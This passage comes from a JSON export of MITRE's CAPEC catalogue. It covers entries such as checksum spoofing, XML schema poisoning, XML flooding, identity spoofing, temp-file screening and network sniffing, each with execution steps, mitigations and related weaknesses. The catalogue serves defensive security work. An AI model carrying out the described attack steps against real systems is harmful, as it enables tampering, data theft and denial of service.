attack."},"Resources_Required":{"Resource":"Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"145":{"ID":"145","Name":"Checksum Spoofing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender\'s checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient\'s checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.","The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.","The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack."]},"Resources_Required":{"Resource":"The adversary must have a utility that can intercept and modify messages between the sender and recipient."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"354"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"}]}},"146":{"ID":"146","Name":"XML Schema Poisoning","Abstraction":"Detailed","Status":"Stable","Description":"An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"271"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine if XML schema is local or remote] Because this attack differs slightly if the target uses remote XML schemas versus local schemas, the adversary first needs to determine which of the two are used."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to XML schema] The adversary gains access to the XML schema so that they can modify the contents.","Technique":["For a local scenario, the adversary needs access to the machine that the schema is located on and needs to gain permissions to alter the contents of the file.","For a remote scenario, the adversary needs to be able to sniff HTTP traffic that contains an XML schema."]},{"Step":"3","Phase":"Exploit","Description":"[Poison XML schema] Once the adversary gains access to the XML schema, they will alter it to achieve a desired effect. Locally, they can simply modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.","Technique":["Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data.","Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.","Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B)."]}]},"Prerequisites":{"Prerequisite":["Some level of access to modify the target schema.","The schema used by the target application must be improperly secured against unauthorized modification and manipulation."]},"Resources_Required":{"Resource":"Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful schema poisoning attack can compromise the availability of the target system\'s service by exhausting its available resources."},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Protect the schema against unauthorized modification.","Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.","Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification."]},"Example_Instances":{"Example":[{"p":["XML Schema Poisoning Attacks can often occur locally due to being embedded within the XML document itself or being located on the host within an improperaly protected file. In these cases, the adversary can simply edit the XML schema without the need for additional privileges. An example of the former can be seen below:","If the \'name\' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur."],"div":["<?xml version=\\"1.0\\"?> <!DOCTYPE contact [ <!ELEMENT contact (name,phone,email,address)> <!ELEMENT name (#PCDATA)> <!ELEMENT phone (#PCDATA)> <!ELEMENT email (#PCDATA)> <!ELEMENT address (#PCDATA)> ]> <note> <name>John Smith</name> <phone>555-1234</phone> <email>jsmith@email.com</email> <address>1 Example Lane</address> </note></capec:Code>",{"style":"margin-left:10px;","class":"attack"}]},{"p":["XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :","The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Adversary-in-the-Middle (CAPEC-94) Attack to alter the schema in the same way as the previous example and to acheive the same results."],"div":["<?xml version=\\"1.0\\"?> <!DOCTYPE contact SYSTEM \\"http://example.com/contact.dtd\\"[ <note> <name>John Smith</name> <phone>555-1234</phone> <email>jsmith@email.com</email> <address>1 Example Lane</address> </note></capec:Code>",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"15"},{"CWE_ID":"472"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"147":{"ID":"147","Name":"XML Ping of the Death","Abstraction":"Detailed","Status":"Draft","Description":"An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"528"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.","Technique":["Use an automated tool to record all instances of URLs to process XML requests.","Use a browser to manually explore the website and analyze how the application processes XML requests."]},{"Step":"2","Phase":"Exploit","Description":"[Launch a resource depletion attack] The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.","Technique":"Send a large number of crafted small XML messages to the target URL."}]},"Prerequisites":{"Prerequisite":"The target must receive and process XML transactions."},"Skills_Required":{"Skill":["To send small XML messages",{"Level":"Low"},"To use distributed network to launch the attack",{"Level":"High"}]},"Resources_Required":{"Resource":"Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"DoS: resource consumption (other)"}},"Mitigations":{"Mitigation":["Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.","Implementation: Provide for network flow control and traffic shaping to control access to the resources."]},"Example_Instances":{"Example":"Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"400"},{"CWE_ID":"770"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Solutions_and_Mitigations"}}},"148":{"ID":"148","Name":"Content Spoofing","Abstraction":"Meta","Status":"Stable","Description":"An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary\'s content instead of the owner\'s content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which they are not authorized. If the content is to be modified in transit, the adversary must be able to intercept the targeted messages."},"Resources_Required":{"Resource":{"p":["If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target\'s communication and generating/creating custom packets to impact the communications.","In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target\'s web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content."]}},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful content spoofing attack compromises the integrity of the application data."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"345"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"12","Entry_Name":"Content Spoofing"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Content Spoofing"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"149":{"ID":"149","Name":"Explore for Predictable Temporary File Names","Abstraction":"Detailed","Status":"Draft","Description":"An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"497","Exclude_Related":{"Exclude_ID":"512"}},{"Nature":"CanPrecede","CAPEC_ID":"155"}]},"Prerequisites":{"Prerequisite":["The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.","The attacker must be able to see the names of the files the target is creating."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"150":{"ID":"150","Name":"Collect Data from Common Resource Locations","Abstraction":"Standard","Status":"Draft","Description":"An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine\'s file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":{"Exclude_ID":"437"}}},"Prerequisites":{"Prerequisite":"The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside."},"Example_Instances":{"Example":"An adversary can use a technique called Bluesnarfing to retrieve data from Bluetooth enabled devices in which they know where the data is located. This is done by connecting to the device\u2019s Object Exchange (OBEX) Push Profile and making OBEX GET requests for known filenames (contact lists, photos, recent calls). Bluesnarfing was patched shortly after its discovery in 2003 and will only work on devices created before or during this time."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"552"},{"CWE_ID":"1239"},{"CWE_ID":"1258"},{"CWE_ID":"1266"},{"CWE_ID":"1272"},{"CWE_ID":"1323"},{"CWE_ID":"1324"},{"CWE_ID":"1330"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1119","Entry_Name":"Automated Collection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Common Resource Location Exploration",{"Date":"2015-12-07"}]}},"151":{"ID":"151","Name":"Identity Spoofing","Abstraction":"Meta","Status":"Stable","Description":"Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The identity associated with the message or resource must be removable or modifiable in an undetectable way."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication","Access Control"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"Employ robust authentication processes (e.g., multi-factor authentication)."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"153":{"ID":"153","Name":"Input Data Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target. For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user\'s data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target\'s processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"20"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"154":{"ID":"154","Name":"Resource Location Spoofing","Abstraction":"Meta","Status":"Stable","Description":"An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}},"Mitigations":{"Mitigation":"Monitor network activity to detect any anomalous or unauthorized communication exchanges."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"}]}},"155":{"ID":"155","Name":"Screen Temporary Files for Sensitive Information","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application\'s routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application\'s temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Look for temporary files in target application] An adversary will try to discover temporary files in a target application. Knowledge of where the temporary files are being stored is important information."},{"Step":"2","Phase":"Experiment","Description":"[Attempt to read temporary files] An adversary will attempt to read any temporary files they may have discovered through normal means.","Technique":["Attempt to get the file by querying the file path to a web server","Using a remote shell into an application, read temporary files and send out information remotely if necessary","Recover temporary information from a user\'s browser cache"]},{"Step":"3","Phase":"Exploit","Description":"[Use function weaknesses to gain access to temporary files] If normal means to read temporary files did not work, an adversary will attempt to exploit weak temporary file functions to gain access to temporary files.","Technique":["Some C functions such as tmpnam(), tempnam(), and mktemp() will create a temporary file with a unique name, but do not stop an adversary from creating a file of the same name before it is opened by the application. Because these functions do not create file names that are sufficiently random, an adversary will try to make a file of the same name, causing a collision, and possibly altering file permissions for the temporary file so that it is able to be read.","Similar to the last technique, an adversary might also create a file name collision using a linked file in a unix system such that the temporary file contents written out by the application write to a file of the adversaries choosing, allowing them to read the file contents."]}]},"Prerequisites":{"Prerequisite":"The target application must utilize temporary files and must fail to adequately secure them against other parties reading them."},"Resources_Required":{"Resource":"Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"377"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Activation_Zone, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"157":{"ID":"157","Name":"Sniffing Attacks","Abstraction":"Standard","Status":"Draft","Description":"In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. AiTM attacks are predominantly active and often alter the content of the communications themselves.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"117","Exclude_Related":{"Exclude_ID":"514"}},{"Nature":"CanPrecede","CAPEC_ID":"652"}]},"Prerequisites":{"Prerequisite":"The target data stream must be transmitted on a medium to which the adversary has access."},"Resources_Required":{"Resource":"The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Encrypt sensitive information when transmitted on insecure mediums to prevent interception."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"311"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"158":{"ID":"158","Name":"Sniffing Network Traffic","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"157"}},"Prerequisites":{"Prerequisite":["The target must be communicating on a network protocol visible by a network sniffing application.","The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication."]},"Skills_Required":{"Skill":["Adversaries can obtain and set up open-source network sniffing tools easily.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.)."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Obfuscate network traffic through encryption to prevent its readability by network sniffers.","Employ appropriate levels of segmentation to your network in accordance with best 